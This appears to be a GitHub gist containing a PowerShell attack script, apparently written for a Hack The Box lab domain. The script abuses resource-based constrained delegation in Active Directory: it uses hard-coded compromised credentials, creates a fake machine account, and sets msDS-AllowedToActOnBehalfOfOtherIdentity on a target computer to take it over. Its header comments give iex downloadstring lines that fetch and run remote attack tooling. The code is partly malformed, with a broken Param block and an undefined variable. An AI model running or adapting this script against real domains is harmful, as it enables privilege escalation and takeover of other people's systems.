Skip to content

Instantly share code, notes, and snippets.


snovvcrash/RbcdPwn.ps1 Secret

Created Jul 11, 2020
What would you like to do?
function Invoke-RbcdPwn {
Make sure to import Powermad.ps1 and PowerView.ps1 before you begin:
curl -L > pm.ps1
iex(new-object net.webclient).downloadstring("")
curl -L > pv.ps1
iex(new-object net.webclient).downloadstring("")
Param (
[Parameter(Mandatory = $true)]
$TargetComputer = 'WEB.htb.local'
$UserWithDaclUsername = 'htb.local\test-svc'
$UserWithDaclPassword = ConvertTo-SecureString 'T3st-S3v!ce-F0r-Pr0d' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential($UserWithDaclUsername, $UserWithDaclPassword)
Write-Host "[*] Target computer to own: $TargetComputer" -ForegroundColor Green
Write-Host "[*] Owned user account which has permissions to configure RBCD on target computer: $UserWithDaclUsername" -ForegroundColor Green
Write-Host "[*] Verifying that the user indeed has all the necessary rights..." -ForegroundColor Green
$AttackerSID = Get-DomainUser $UserWithDaclUsername.Substring($($UserWithDaclUsername.IndexOf('\')) + 1) -Properties 'ObjectSid' -Verbose -Credential $Cred | Select -Expand 'ObjectSid'
$ACE = Get-DomainObjectACL $TargetComputer -Verbose -Credential $Cred | ?{$_.SecurityIdentifier -match $AttackerSID}
Write-Host "[+] ACE:" -ForegroundColor Green
Echo $ACE
Write-Host "[*] Creating a new machine account with Powermad.ps1..." -ForegroundColor Green
New-MachineAccount -MachineAccount $FakeMachine -Password $(ConvertTo-SecureString 'P@ssw0rd!' -AsPlainText -Force) -Verbose -Credential $Cred
$ComputerSid = Get-DomainComputer $FakeMachine -Properties 'ObjectSid' -Verbose -Credential $Cred | Select -Expand 'ObjectSid'
Write-Host "[*] New machine account SID: $ComputerSid" -ForegroundColor Green
Write-Host "[*] Setting the msDS-AllowedToActOnBehalfOfOtherIdentity property on target computer..." -ForegroundColor Green
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer $TargetComputer -Verbose -Credential $Cred | Set-DomainObject -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$SDBytes} -Verbose -Credential $Cred
Write-Host "[*] Confirming that the msDS-AllowedToActOnBehalfOfOtherIdentity property was set correctly..." -ForegroundColor Green
$RawBytes = Get-DomainComputer $TargetComputer -Properties 'msDS-AllowedToActOnBehalfOfOtherIdentity' -Verbose -Credential $Cred | Select -Expand 'msDS-AllowedToActOnBehalfOfOtherIdentity'
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
Write-Host "[+] Security descriptor:" -ForegroundColor Green
Echo $Descriptor.DiscretionaryAcl
# Clear the msDS-AllowedToActOnBehalfOfOtherIdentity property after you got your TGS with Rubeus:
#Get-DomainComputer $TargetComputer -Verbose -Credential $Cred | Set-DomainObject -Clear 'msDS-AllowedToActOnBehalfOfOtherIdentity' -Verbose -Credential $Cred
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment